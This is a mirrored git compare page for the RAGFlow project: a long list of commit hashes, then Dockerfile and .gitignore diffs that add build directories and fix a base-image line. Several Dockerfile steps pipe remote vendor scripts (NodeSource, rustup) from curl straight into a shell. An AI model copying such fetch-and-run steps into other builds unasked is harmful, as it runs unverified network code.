mirror of
https://github.com/infiniflow/ragflow.git
synced 2025-12-08 20:42:30 +08:00
Compare commits
765 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 2f33ec7ad0 | |||
| 3b1375ef99 | |||
| 2c05e6e6bd | |||
| 8ccc696723 | |||
| 1621313c0f | |||
| b94c15ef1e | |||
| 8a16c8cc44 | |||
| b12a437a30 | |||
| deeb950e1c | |||
| 6a0702f55f | |||
| 3044cb85fd | |||
| d3262ca378 | |||
| 99a7c0fb97 | |||
| 7e75b9d778 | |||
| a467f31238 | |||
| 54342ae0a2 | |||
| bdcf195b20 | |||
| 3f571a13c2 | |||
| 9d4bb5767c | |||
| 5e7b93e802 | |||
| ec4def9a44 | |||
| 2bd71d722b | |||
| 8f2c0176b4 | |||
| b261b6aac0 | |||
| cbdf54cf36 | |||
| db0606e064 | |||
| cfae63d107 | |||
| 88f8c8ed86 | |||
| 4158697fe6 | |||
| 5f9cb16a3c | |||
| 4730145696 | |||
| 68d0210e92 | |||
| f8e9a0590f | |||
| ba834aee26 | |||
| 983540614e | |||
| 6722b3d558 | |||
| 6000c3e304 | |||
| 333608a1d4 | |||
| 8052cbc70e | |||
| b0e0e1fdd0 | |||
| 8e3228d461 | |||
| f789098e9f | |||
| d6e6c530d7 | |||
| 22c5affacc | |||
| 35b7d17d97 | |||
| 1fc14ff6d4 | |||
| 7fad48f42c | |||
| 77988fe3c2 | |||
| cb00f36f62 | |||
| 7edb4ad7dc | |||
| 66c54e75f3 | |||
| f60dfffb4b | |||
| f1ad778250 | |||
| 7c8f159751 | |||
| c57cc0769b | |||
| 869df1f704 | |||
| 42eeb38247 | |||
| 7241c73c7a | |||
| 336a639164 | |||
| ceae4df889 | |||
| 884dcbcb7e | |||
| 4b57177523 | |||
| 4130519599 | |||
| 0c73f77c4d | |||
| fbe68034aa | |||
| 22acd0ac67 | |||
| 4cf122c6db | |||
| 6a77c94365 | |||
| 80656309f7 | |||
| 9f7d187ab3 | |||
| 63da2cb7d5 | |||
| cb69c742b0 | |||
| 2ac72899ef | |||
| 473f9892fb | |||
| fe4b2bf969 | |||
| c18b78b261 | |||
| 8dd3adc443 | |||
| e85fea31a8 | |||
| 1aba978de2 | |||
| 7e0b3d19d6 | |||
| 788ca41d9e | |||
| 6b23308f26 | |||
| 925dd2aa85 | |||
| b5a2711c05 | |||
| c6e723f2ee | |||
| fd3e55cfcf | |||
| 6ae0da92cb | |||
| 9377192859 | |||
| 42671e08f1 | |||
| b2f87a9f8f | |||
| 878dca26bb | |||
| 445576ec88 | |||
| 04de0c4cef | |||
| 7e65df87dd | |||
| 7c98cb5075 | |||
| 6df0f44e71 | |||
| c998ad7a18 | |||
| 1dcc416c70 | |||
| 8c075f8287 | |||
| 9b90a44323 | |||
| 426fdafb66 | |||
| 02fb7a88e3 | |||
| 0fe19f3fbc | |||
| 9b4cceb3f7 | |||
| 65255f2a8e | |||
| 9dd380d474 | |||
| 0164856343 | |||
| 4f05803690 | |||
| abc32803cc | |||
| 07de36ec86 | |||
| 87a998e9e5 | |||
| 0aafa281a5 | |||
| 2871455e4e | |||
| f09b204ae4 | |||
| 5a2c542ce2 | |||
| 4d9e9f0dbb | |||
| 6d232f1bdb | |||
| 21179a9be9 | |||
| 9081bc969a | |||
| e949594579 | |||
| 1a1888ed22 | |||
| 97e4eccf03 | |||
| b10eb8d085 | |||
| 1d2c081710 | |||
| ad09d4bb24 | |||
| b9c383612d | |||
| ab9efb3c23 | |||
| 922f79e757 | |||
| c04686d426 | |||
| 9a85f83569 | |||
| 5decdde182 | |||
| def18308d0 | |||
| fc6d8ee77f | |||
| 5400467da1 | |||
| 2c771fb0b4 | |||
| 667632ba00 | |||
| a82f092dac | |||
| 742d0f0ea9 | |||
| 69bbf8e9c5 | |||
| 12975cf128 | |||
| 99993e5026 | |||
| 15b78bd894 | |||
| f8a479bf88 | |||
| f87e7242cd | |||
| fc1ac3a962 | |||
| 212bb8e601 | |||
| 06abef66ef | |||
| 0abc01311b | |||
| 1eb6286339 | |||
| 4bd6c3145c | |||
| 190e144a70 | |||
| 527ebec2f5 | |||
| a0b7c78dca | |||
| 54f7c6ea8e | |||
| f843dd05e5 | |||
| 3abc9be1c2 | |||
| e627ee9ea4 | |||
| 6c1f1a9f53 | |||
| b51237be17 | |||
| 5daed10136 | |||
| 074d4f5031 | |||
| e9f5468a49 | |||
| a2b4d0190c | |||
| c8097e97cb | |||
| fc172b4a79 | |||
| 0bea7f21ae | |||
| 61d2a74b25 | |||
| 1d88b197fb | |||
| b88c3897b9 | |||
| 2da4e7aa46 | |||
| cf038e099f | |||
| 88d52e335c | |||
| 13785edaae | |||
| 6d3e3e4e3c | |||
| 6b7c028578 | |||
| c3e344b0f1 | |||
| e9202999cb | |||
| a6d85c6c2f | |||
| 7539d142a9 | |||
| e953f01951 | |||
| eb20b60b13 | |||
| d48731ac8c | |||
| b4a5d83b44 | |||
| 99af1cbeac | |||
| 63d0b39c5c | |||
| 863cec1bad | |||
| e14e0ec695 | |||
| 6228b1bd53 | |||
| e18f407604 | |||
| 60767e66e0 | |||
| cc6a48b128 | |||
| 19396998eb | |||
| 89b05ad79f | |||
| 884fd83dc7 | |||
| c739b68b29 | |||
| 35e880c432 | |||
| 733219cc3f | |||
| 21f2c5838b | |||
| 20f3f54714 | |||
| e4765ebe0c | |||
| 3f263df3ef | |||
| 404cdc0b6d | |||
| f2c4d53c58 | |||
| 642006c8e2 | |||
| 59ba34e167 | |||
| 4580ad2fd7 | |||
| 11dd23d8aa | |||
| c5c3240c4c | |||
| 0f95086813 | |||
| 9b3f5fd38b | |||
| 6c26872799 | |||
| 85247e6837 | |||
| 17ada637db | |||
| c9d7a34690 | |||
| 96438ca821 | |||
| 7927d80a84 | |||
| be431449bd | |||
| 02985fc905 | |||
| 6f438e0a49 | |||
| 5efb3476f2 | |||
| 83c673e093 | |||
| 8d2f8ed561 | |||
| 73a03287a5 | |||
| 85f10f84bd | |||
| 9cfd521d67 | |||
| e91af1dff9 | |||
| 9065fb1050 | |||
| 99b634c68d | |||
| 79426fc41f | |||
| be5a67895e | |||
| 5a4e64e741 | |||
| 2302a6baba | |||
| a74c0ccce0 | |||
| 8e75a23ad0 | |||
| 4121636084 | |||
| 3738dd71ab | |||
| 9729ca2aed | |||
| e5caa702f5 | |||
| 644f68de97 | |||
| b4ef50bdb5 | |||
| 5b5e3677b6 | |||
| c9551b7f68 | |||
| 4810cb2dc9 | |||
| d92e927685 | |||
| 7bdd5a48c0 | |||
| d3ff1a30bf | |||
| 6acc46bc7b | |||
| ef8728a314 | |||
| 5169299826 | |||
| bd19656c8f | |||
| c59c1b603d | |||
| c9caccf354 | |||
| eedec157a7 | |||
| c6c3961250 | |||
| 6b3a40be5c | |||
| 1328d715db | |||
| a3a5a9966f | |||
| 78ed8fe9a5 | |||
| 853aa121a9 | |||
| 54fc6dcf01 | |||
| da8802d010 | |||
| d73a75506e | |||
| 13bcfd7ebd | |||
| aa8b021478 | |||
| e013ac52af | |||
| 06700850df | |||
| 7a08e91909 | |||
| 77f0fb03e3 | |||
| da2d8b8267 | |||
| b75115264d | |||
| 8badf3f423 | |||
| eb8feaf20a | |||
| 936d8ab7dd | |||
| 68d1315079 | |||
| 6baba54e9e | |||
| ad48e8d915 | |||
| cafdee536f | |||
| cd861e3653 | |||
| e9e39d57ce | |||
| 94cb66ba80 | |||
| 9a6dc89156 | |||
| fdd5b1b8cf | |||
| 827042f72b | |||
| 37be0ff3d3 | |||
| a313b77cdd | |||
| 4fecc2fae6 | |||
| ff75008801 | |||
| e3cf14a3c9 | |||
| 6529c764c9 | |||
| 44184d12a8 | |||
| 8779aa1986 | |||
| 411c645134 | |||
| afccbc88e8 | |||
| 33e78cf638 | |||
| 193aa3ba88 | |||
| ffb3fc4bf5 | |||
| 6ccfbca204 | |||
| 439da32234 | |||
| db8f83104f | |||
| f43db8bc51 | |||
| ce587cba56 | |||
| 5164835681 | |||
| c981a57616 | |||
| c7d00c2272 | |||
| aed1bbbcaa | |||
| 19ded65c66 | |||
| ad6def4178 | |||
| ed6a693820 | |||
| 1d5a9b74ff | |||
| e34817c2a9 | |||
| 60428c4ad2 | |||
| 7bc9742674 | |||
| a199572bf8 | |||
| 06dfb83529 | |||
| 3c19e3125b | |||
| 4ae9de76d4 | |||
| c55e9d16da | |||
| 4c2906d6fd | |||
| 1e2c0c6705 | |||
| ede733e130 | |||
| b67484e77d | |||
| 66e4113e0b | |||
| 0dba1743e3 | |||
| 43199c45c3 | |||
| 3fd7db40ea | |||
| 5650442b0b | |||
| 5b013da4d6 | |||
| fe797bcc66 | |||
| 9542f4484c | |||
| 2452c5624f | |||
| a5c03ccd4c | |||
| d2213141e0 | |||
| 3da3260eb5 | |||
| 07f283b73e | |||
| 29509ff69d | |||
| 216f6495c4 | |||
| f60a249fe1 | |||
| 152072f900 | |||
| 80032b1fc0 | |||
| 5d55e6a049 | |||
| 418700b455 | |||
| eea6565472 | |||
| 3f21603558 | |||
| 3a739e3dd7 | |||
| 4ba1ba973a | |||
| e8b9871fb9 | |||
| e37b0d217d | |||
| 50e9df4c76 | |||
| b9a50ef4b8 | |||
| da11a20c92 | |||
| 955619c8ac | |||
| ad2e116367 | |||
| ccbd4365be | |||
| 9169643157 | |||
| 5cff780ec4 | |||
| ceb0419fe5 | |||
| 74ebc497c1 | |||
| 161cb08bbd | |||
| ff8702f7de | |||
| a973b9e01f | |||
| 5e19423d82 | |||
| 29f7f8b81e | |||
| 6012f376ca | |||
| 8468031e39 | |||
| aac460ad29 | |||
| 753c13d76f | |||
| 0cb588f7bf | |||
| ebdd71ce68 | |||
| 013856b604 | |||
| 61096596bc | |||
| 549d67e281 | |||
| 79c873344b | |||
| 548f01850f | |||
| 3f495b2d22 | |||
| c943517932 | |||
| 935687998e | |||
| 375f621405 | |||
| a99d19bdea | |||
| 906c0c5c89 | |||
| c92d334b29 | |||
| d38f995ba6 | |||
| bc50f68127 | |||
| b24abee364 | |||
| 6fee2962cb | |||
| e67bfca552 | |||
| d5f87a5498 | |||
| d7426d86d5 | |||
| 7ca98848ac | |||
| 32d5885b68 | |||
| f4d182e4ee | |||
| 69b9581417 | |||
| 1e21056364 | |||
| fdfa5d0ad4 | |||
| d96348eb22 | |||
| 100b3165d8 | |||
| 7e60800c95 | |||
| 4b195cc14c | |||
| 7034dc8dea | |||
| 71f2ba1452 | |||
| 1ec84a589e | |||
| eb40377700 | |||
| bbf9d6d786 | |||
| 8c2b91d3db | |||
| 55028b2db7 | |||
| daf86dbf74 | |||
| b2ef6a05a1 | |||
| 6bc3a2d58a | |||
| d69f4ec829 | |||
| ef45526700 | |||
| 79034bd194 | |||
| 60356b52c6 | |||
| 80d703f9c2 | |||
| 022afbb39d | |||
| 792a1a9d91 | |||
| d2b70e73dd | |||
| 37b0829e28 | |||
| b4a281eca1 | |||
| 95821f6fb6 | |||
| bf2ea04d02 | |||
| ac7a0d4fbf | |||
| 9f109adf28 | |||
| cf12c3cc1f | |||
| 29a7b7a040 | |||
| eb42adc818 | |||
| a4d230f12b | |||
| 9352a09c53 | |||
| a0c1d83ddc | |||
| 657019a5a9 | |||
| 58df013722 | |||
| 347cb61f26 | |||
| 264303ba98 | |||
| 1c90c39897 | |||
| 3fcdba1683 | |||
| 915354bec9 | |||
| c0090a1b4f | |||
| be6d5b76c3 | |||
| fb21efd77d | |||
| cf4fff64f8 | |||
| 0b94376cd4 | |||
| 2b5812d0a9 | |||
| 4da3ee400b | |||
| f8602b5286 | |||
| fc8a752cd5 | |||
| 478cd006d6 | |||
| 4d10dbcf95 | |||
| 43cd455b52 | |||
| b54d5807f3 | |||
| 58e95f76c1 | |||
| 06fd35d420 | |||
| 4df75ca84e | |||
| 701e5be535 | |||
| 9ae57eb370 | |||
| fe5dd5b70a | |||
| 1015436691 | |||
| 83c9f1ed39 | |||
| e4f4b30ae3 | |||
| 9bf6f7c9a0 | |||
| b06957e561 | |||
| baeedc699d | |||
| 00943dc04a | |||
| f43cf7c2b0 | |||
| 9e1421b77c | |||
| 13389be3f4 | |||
| a5306e6345 | |||
| 99adeabc85 | |||
| 6a5e1d597c | |||
| 266119bf62 | |||
| 75086f41a9 | |||
| 3657b1f2a2 | |||
| 975798c643 | |||
| 607de74ace | |||
| 2a647162a8 | |||
| d4332643c4 | |||
| 2ea696934b | |||
| 5a6a34cef9 | |||
| 1daa0b4d46 | |||
| 60d406acaa | |||
| 1a6bd437f5 | |||
| 258a10fb74 | |||
| fdc21ec853 | |||
| c2693d2f46 | |||
| ca9c9c4e1e | |||
| bafe137502 | |||
| 2dea8448a6 | |||
| d9868d0229 | |||
| 38a90c32b2 | |||
| eecec7b119 | |||
| 4eeb535946 | |||
| 26de9adb41 | |||
| 0c9a7caa9d | |||
| a5a617b7a3 | |||
| d5618749c9 | |||
| de8267cfd7 | |||
| 740714b79d | |||
| 013db9410f | |||
| b96ba6f831 | |||
| d29fd52e14 | |||
| 99f7bbaaa2 | |||
| 575099df2d | |||
| ddeac9ab3d | |||
| 009e18f094 | |||
| 9c023b6d8c | |||
| 2c2b2e0779 | |||
| 8d7fb12305 | |||
| 7f4c63d102 | |||
| 3e9f444e6b | |||
| 2290c2a2f0 | |||
| dbb8f7b77b | |||
| 8964817d72 | |||
| 0b950da73f | |||
| 30b88e2b91 | |||
| fb66b1e726 | |||
| 198a8b6592 | |||
| 56e3fa2d6a | |||
| 24f9b17ff6 | |||
| 427fb97562 | |||
| 3413f43b47 | |||
| f8aa31b159 | |||
| 669d634d74 | |||
| 59417016a8 | |||
| 1eb1f7ad33 | |||
| 98295caffe | |||
| f5dc94fc85 | |||
| c889ef6363 | |||
| 593c20889d | |||
| fce3f6df8e | |||
| 61557a101a | |||
| 1f967191d4 | |||
| 0f597b9817 | |||
| 1cff117dc9 | |||
| e3f5464457 | |||
| 6144a109ab | |||
| b3ebc66b13 | |||
| dcb3fb2073 | |||
| f4674ae9d0 | |||
| de610091eb | |||
| d57a68bc2a | |||
| a2eb0df875 | |||
| edc61e9b4c | |||
| 472fcba7af | |||
| 74ec3bc4d9 | |||
| a3f4258cfc | |||
| cf542e80b3 | |||
| 957cd55e4a | |||
| 25a8c076bf | |||
| 306108fe0e | |||
| daaf6aed50 | |||
| 3b50389ee7 | |||
| 258c9ea644 | |||
| acd78c5ef2 | |||
| 1d3e4844a5 | |||
| 4122695a1a | |||
| 3ccb62910b | |||
| a6765e9ca4 | |||
| dec3bf7503 | |||
| 745e98e56a | |||
| 1defc83506 | |||
| 65e59862e4 | |||
| 477a52620f | |||
| 7c9ea5cad9 | |||
| f6159ee4d3 | |||
| a7423e3a94 | |||
| 25c4c717cb | |||
| f9adeb9647 | |||
| 04487d1bce | |||
| 68b9a857c2 | |||
| 5fa3c2bdce | |||
| b5389f487c | |||
| 8b1c145e56 | |||
| 92e9320657 | |||
| 5eb21b9c7c | |||
| 4542346f18 | |||
| fc7cc1d36c | |||
| 751447bd4f | |||
| f26d01dfa3 | |||
| cd3c739982 | |||
| 44c7a0e281 | |||
| 8c9b54db31 | |||
| 6a7c2112f7 | |||
| 0acf4194ca | |||
| 89004f1faf | |||
| 5a36866cf2 | |||
| c8523dc6fd | |||
| 840e921e96 | |||
| 5a1e01d96f | |||
| fbb8cbfc67 | |||
| 0ce720a247 | |||
| 47926a95ae | |||
| ff8793a031 | |||
| a95c1d45f0 | |||
| 45853505bb | |||
| b3f782b3d3 | |||
| 16a1d24a02 | |||
| a943aefa4d | |||
| 038ca8c0ea | |||
| fa5695c250 | |||
| e43208a1ca | |||
| fef663a59d | |||
| 83b91d90fe | |||
| f6ae8fcb71 | |||
| d1ea429bdd | |||
| b75bb1d8d3 | |||
| 6c6f5a3a47 | |||
| 80163c043e | |||
| 9fcf9a10c6 | |||
| 38bd02f402 | |||
| 9a0736b20f | |||
| 4fcd05ad23 | |||
| f8fe4154e8 | |||
| 57970570ee | |||
| d185a2e7f2 | |||
| a4ea5a120b | |||
| 15bf9f8c25 | |||
| 18f4a6b35c | |||
| f7cdb2678c | |||
| 3c1444ab19 | |||
| fb56a29478 | |||
| e99e8b93fb | |||
| 5ec19b5f53 | |||
| 0b90aab22c | |||
| fe1805fa0e | |||
| f73f7b969c | |||
| 81d1c5a695 | |||
| 8d667d5abd | |||
| 01ad2e5296 | |||
| fcdda9f8c5 | |||
| e35f7610e7 | |||
| 7920a5c78d | |||
| 4d957f2d3b | |||
| a89389a05a | |||
| d9a9be4b4c | |||
| 6be3626372 | |||
| 1eb4caf02a | |||
| f04fb36c26 | |||
| 747e69ef68 | |||
| c68767acdd | |||
| 4447039a4c | |||
| 90975460af | |||
| 7dc39cbfa6 | |||
| a25d32496c | |||
| 2023fdc13e | |||
| 64c83f300a | |||
| 3b7b6240c3 | |||
| e05395d2a7 | |||
| 169281958b | |||
| abcd3d2469 | |||
| 2cc89211f6 | |||
| 0e3a877e5c | |||
| da64cfd173 | |||
| ff5ea266d2 | |||
| 8902d92d0e | |||
| e28d13e3b4 | |||
| 0b92f02672 | |||
| cf2f6592dd | |||
| 97ced2f667 | |||
| 7eb69fe6d9 | |||
| 68a698655a | |||
| f900e432f3 | |||
| 267d6b28be | |||
| 706985c188 | |||
| 59efba3d87 | |||
| 22468a8590 | |||
| d0951ee27b | |||
| 31da511d1d | |||
| f8d0d657fb | |||
| 923c3b8cac | |||
| 2ff1b410b9 | |||
| f65d6a957b | |||
| 722c342d56 | |||
| dbdae8e83c | |||
| 6399a4fde2 | |||
| 631753f1a9 | |||
| ad87825a1b | |||
| b04f0510f9 | |||
| 1552dca28d | |||
| db35e9df4f | |||
| d9dc183a0e | |||
| 195498daaa | |||
| 4454ba7a1e | |||
| 72c6784ff8 | |||
| b6980d8a16 | |||
| 39ac3b1e60 | |||
| b8eedbdd86 | |||
| 8295979bb2 | |||
| 037657c1ce | |||
| 4fba0427eb | |||
| c74d4d683e | |||
| 0b15c47d70 | |||
| 7d41de42a1 | |||
| 9517a27844 | |||
| cc064040a2 | |||
| cdea1d0a85 | |||
| 1de31ca9f6 | |||
| 4ec845c0a6 | |||
| c58a1c48eb | |||
| fefe7124a1 | |||
| ebdc283cd5 | |||
| 260c68f60c | |||
| 5d2f7136dd | |||
| b85c15cc96 | |||
| 9ed0e50f6b | |||
| b9bb11879f | |||
| dc7afe46fb | |||
| 4f4d8baf49 | |||
| 83803a72ee | |||
| c3c2515691 | |||
| 117a173fff | |||
| 77363a0875 | |||
| 843720f958 | |||
| f077b57f8b | |||
| c62834f870 | |||
| 0171082cc5 | |||
| 8dd45459be | |||
| dded365b8d | |||
| 9fdd517af6 | |||
| 2604ded2e4 | |||
| 758eb03ccb | |||
| e0d05a3895 | |||
| 614defec21 | |||
| e1f0644deb | |||
| a135f9f5b6 | |||
| daa4799385 | |||
| 495a6434ec | |||
| 21aac545d9 | |||
| 0f317221b4 | |||
| a427672229 | |||
| 196f2b445f | |||
| 5041677f11 | |||
| 7eee193956 | |||
| 9ffd7ae321 | |||
| ec6ae744a1 | |||
| d9bc093df1 | |||
| 571aaaff22 | |||
| 7d8e03ec38 | |||
| 65677f65c9 | |||
| 89d296feab | |||
| 3ae8a87986 | |||
| 46454362d7 | |||
| 55fb96131e | |||
| 20b57144b0 | |||
| 9e3a0e4d03 | |||
| c0d71adaa2 | |||
| 735bdf06a4 | |||
| fe18627ebc | |||
| 4cda40c3ef | |||
| 1e5c5abe58 | |||
| 6f99bbbb08 | |||
| 3bbdf3b770 | |||
| 070b53f3bf | |||
| eb51ad73d6 | |||
| fbd0d74053 | |||
| 170186ee4d | |||
| ed184ed87e | |||
| 43412571f7 | |||
| 17489e6c6c | |||
| 21453ffff0 | |||
| be13429d05 | |||
| 5178daeeaf | |||
| d5b8d8e647 | |||
| b62a20816e | |||
| 3cae87a902 | |||
| 1797f5ce31 | |||
| fe4b2e4670 | |||
| 250119e03a | |||
| bae376a479 |
8
.gitignore
vendored
8
.gitignore
vendored
@ -29,4 +29,10 @@ Cargo.lock
|
||||
docker/ragflow-logs/
|
||||
/flask_session
|
||||
/logs
|
||||
rag/res/deepdoc
|
||||
rag/res/deepdoc
|
||||
|
||||
# Exclude sdk generated files
|
||||
sdk/python/ragflow.egg-info/
|
||||
sdk/python/build/
|
||||
sdk/python/dist/
|
||||
sdk/python/ragflow_sdk.egg-info/
|
||||
@ -10,6 +10,8 @@ ADD ./api ./api
|
||||
ADD ./conf ./conf
|
||||
ADD ./deepdoc ./deepdoc
|
||||
ADD ./rag ./rag
|
||||
ADD ./agent ./agent
|
||||
ADD ./graphrag ./graphrag
|
||||
|
||||
ENV PYTHONPATH=/ragflow/
|
||||
ENV HF_ENDPOINT=https://hf-mirror.com
|
||||
|
||||
43
Dockerfile.arm
Normal file
43
Dockerfile.arm
Normal file
@ -0,0 +1,43 @@
|
||||
FROM python:3.11
|
||||
USER root
|
||||
|
||||
WORKDIR /ragflow
|
||||
|
||||
COPY requirements_arm.txt /ragflow/requirements.txt
|
||||
|
||||
|
||||
RUN pip install nltk --default-timeout=10000
|
||||
|
||||
RUN pip install -i https://mirrors.aliyun.com/pypi/simple/ --default-timeout=1000 -r requirements.txt &&\
|
||||
python -c "import nltk;nltk.download('punkt');nltk.download('wordnet')"
|
||||
|
||||
RUN apt-get update && \
|
||||
apt-get install -y curl gnupg && \
|
||||
rm -rf /var/lib/apt/lists/*
|
||||
|
||||
RUN curl -sL https://deb.nodesource.com/setup_20.x | bash - && \
|
||||
apt-get install -y --fix-missing nodejs nginx ffmpeg libsm6 libxext6 libgl1
|
||||
|
||||
RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
|
||||
ENV PATH="/root/.cargo/bin:${PATH}"
|
||||
|
||||
RUN pip install graspologic
|
||||
|
||||
ADD ./web ./web
|
||||
RUN cd ./web && npm i --force && npm run build
|
||||
|
||||
ADD ./api ./api
|
||||
ADD ./conf ./conf
|
||||
ADD ./deepdoc ./deepdoc
|
||||
ADD ./rag ./rag
|
||||
ADD ./agent ./agent
|
||||
ADD ./graphrag ./graphrag
|
||||
|
||||
ENV PYTHONPATH=/ragflow/
|
||||
ENV HF_ENDPOINT=https://hf-mirror.com
|
||||
|
||||
ADD docker/entrypoint.sh ./entrypoint.sh
|
||||
ADD docker/.env ./
|
||||
RUN chmod +x ./entrypoint.sh
|
||||
|
||||
ENTRYPOINT ["./entrypoint.sh"]
|
||||
@ -1,25 +1,27 @@
|
||||
FROM FROM infiniflow/ragflow-base:v2.0
|
||||
USER root
|
||||
|
||||
WORKDIR /ragflow
|
||||
|
||||
## for cuda > 12.0
|
||||
RUN /root/miniconda3/envs/py11/bin/pip uninstall -y onnxruntime-gpu
|
||||
RUN /root/miniconda3/envs/py11/bin/pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
||||
|
||||
|
||||
ADD ./web ./web
|
||||
RUN cd ./web && npm i --force && npm run build
|
||||
|
||||
ADD ./api ./api
|
||||
ADD ./conf ./conf
|
||||
ADD ./deepdoc ./deepdoc
|
||||
ADD ./rag ./rag
|
||||
|
||||
ENV PYTHONPATH=/ragflow/
|
||||
ENV HF_ENDPOINT=https://hf-mirror.com
|
||||
|
||||
ADD docker/entrypoint.sh ./entrypoint.sh
|
||||
RUN chmod +x ./entrypoint.sh
|
||||
|
||||
ENTRYPOINT ["./entrypoint.sh"]
|
||||
FROM infiniflow/ragflow-base:v2.0
|
||||
USER root
|
||||
|
||||
WORKDIR /ragflow
|
||||
|
||||
## for cuda > 12.0
|
||||
RUN pip uninstall -y onnxruntime-gpu
|
||||
RUN pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
||||
|
||||
|
||||
ADD ./web ./web
|
||||
RUN cd ./web && npm i --force && npm run build
|
||||
|
||||
ADD ./api ./api
|
||||
ADD ./conf ./conf
|
||||
ADD ./deepdoc ./deepdoc
|
||||
ADD ./rag ./rag
|
||||
ADD ./agent ./agent
|
||||
ADD ./graphrag ./graphrag
|
||||
|
||||
ENV PYTHONPATH=/ragflow/
|
||||
ENV HF_ENDPOINT=https://hf-mirror.com
|
||||
|
||||
ADD docker/entrypoint.sh ./entrypoint.sh
|
||||
RUN chmod +x ./entrypoint.sh
|
||||
|
||||
ENTRYPOINT ["./entrypoint.sh"]
|
||||
|
||||
@ -1,54 +1,56 @@
|
||||
FROM ubuntu:22.04
|
||||
USER root
|
||||
|
||||
WORKDIR /ragflow
|
||||
|
||||
RUN apt-get update && apt-get install -y wget curl build-essential libopenmpi-dev
|
||||
|
||||
RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
|
||||
bash ~/miniconda.sh -b -p /root/miniconda3 && \
|
||||
rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
|
||||
echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
|
||||
echo "conda activate base" >> ~/.bashrc
|
||||
|
||||
ENV PATH /root/miniconda3/bin:$PATH
|
||||
|
||||
RUN conda create -y --name py11 python=3.11
|
||||
|
||||
ENV CONDA_DEFAULT_ENV py11
|
||||
ENV CONDA_PREFIX /root/miniconda3/envs/py11
|
||||
ENV PATH $CONDA_PREFIX/bin:$PATH
|
||||
|
||||
RUN curl -sL https://deb.nodesource.com/setup_14.x | bash -
|
||||
RUN apt-get install -y nodejs
|
||||
|
||||
RUN apt-get install -y nginx
|
||||
|
||||
ADD ./web ./web
|
||||
ADD ./api ./api
|
||||
ADD ./conf ./conf
|
||||
ADD ./deepdoc ./deepdoc
|
||||
ADD ./rag ./rag
|
||||
ADD ./requirements.txt ./requirements.txt
|
||||
|
||||
RUN apt install openmpi-bin openmpi-common libopenmpi-dev
|
||||
ENV LD_LIBRARY_PATH /usr/lib/x86_64-linux-gnu/openmpi/lib:$LD_LIBRARY_PATH
|
||||
RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
|
||||
RUN cd ./web && npm i --force && npm run build
|
||||
RUN conda run -n py11 pip install -i https://mirrors.aliyun.com/pypi/simple/ -r ./requirements.txt
|
||||
|
||||
RUN apt-get update && \
|
||||
apt-get install -y libglib2.0-0 libgl1-mesa-glx && \
|
||||
rm -rf /var/lib/apt/lists/*
|
||||
|
||||
RUN conda run -n py11 pip install -i https://mirrors.aliyun.com/pypi/simple/ ollama
|
||||
RUN conda run -n py11 python -m nltk.downloader punkt
|
||||
RUN conda run -n py11 python -m nltk.downloader wordnet
|
||||
|
||||
ENV PYTHONPATH=/ragflow/
|
||||
ENV HF_ENDPOINT=https://hf-mirror.com
|
||||
|
||||
ADD docker/entrypoint.sh ./entrypoint.sh
|
||||
RUN chmod +x ./entrypoint.sh
|
||||
|
||||
ENTRYPOINT ["./entrypoint.sh"]
|
||||
FROM ubuntu:22.04
|
||||
USER root
|
||||
|
||||
WORKDIR /ragflow
|
||||
|
||||
RUN apt-get update && apt-get install -y wget curl build-essential libopenmpi-dev
|
||||
|
||||
RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
|
||||
bash ~/miniconda.sh -b -p /root/miniconda3 && \
|
||||
rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
|
||||
echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
|
||||
echo "conda activate base" >> ~/.bashrc
|
||||
|
||||
ENV PATH /root/miniconda3/bin:$PATH
|
||||
|
||||
RUN conda create -y --name py11 python=3.11
|
||||
|
||||
ENV CONDA_DEFAULT_ENV py11
|
||||
ENV CONDA_PREFIX /root/miniconda3/envs/py11
|
||||
ENV PATH $CONDA_PREFIX/bin:$PATH
|
||||
|
||||
RUN curl -sL https://deb.nodesource.com/setup_14.x | bash -
|
||||
RUN apt-get install -y nodejs
|
||||
|
||||
RUN apt-get install -y nginx
|
||||
|
||||
ADD ./web ./web
|
||||
ADD ./api ./api
|
||||
ADD ./conf ./conf
|
||||
ADD ./deepdoc ./deepdoc
|
||||
ADD ./rag ./rag
|
||||
ADD ./requirements.txt ./requirements.txt
|
||||
ADD ./agent ./agent
|
||||
ADD ./graphrag ./graphrag
|
||||
|
||||
RUN apt install openmpi-bin openmpi-common libopenmpi-dev
|
||||
ENV LD_LIBRARY_PATH /usr/lib/x86_64-linux-gnu/openmpi/lib:$LD_LIBRARY_PATH
|
||||
RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
|
||||
RUN cd ./web && npm i --force && npm run build
|
||||
RUN conda run -n py11 pip install -i https://mirrors.aliyun.com/pypi/simple/ -r ./requirements.txt
|
||||
|
||||
RUN apt-get update && \
|
||||
apt-get install -y libglib2.0-0 libgl1-mesa-glx && \
|
||||
rm -rf /var/lib/apt/lists/*
|
||||
|
||||
RUN conda run -n py11 pip install -i https://mirrors.aliyun.com/pypi/simple/ ollama
|
||||
RUN conda run -n py11 python -m nltk.downloader punkt
|
||||
RUN conda run -n py11 python -m nltk.downloader wordnet
|
||||
|
||||
ENV PYTHONPATH=/ragflow/
|
||||
ENV HF_ENDPOINT=https://hf-mirror.com
|
||||
|
||||
ADD docker/entrypoint.sh ./entrypoint.sh
|
||||
RUN chmod +x ./entrypoint.sh
|
||||
|
||||
ENTRYPOINT ["./entrypoint.sh"]
|
||||
|
||||
@ -1,56 +1,58 @@
|
||||
FROM opencloudos/opencloudos:9.0
|
||||
USER root
|
||||
|
||||
WORKDIR /ragflow
|
||||
|
||||
RUN dnf update -y && dnf install -y wget curl gcc-c++ openmpi-devel
|
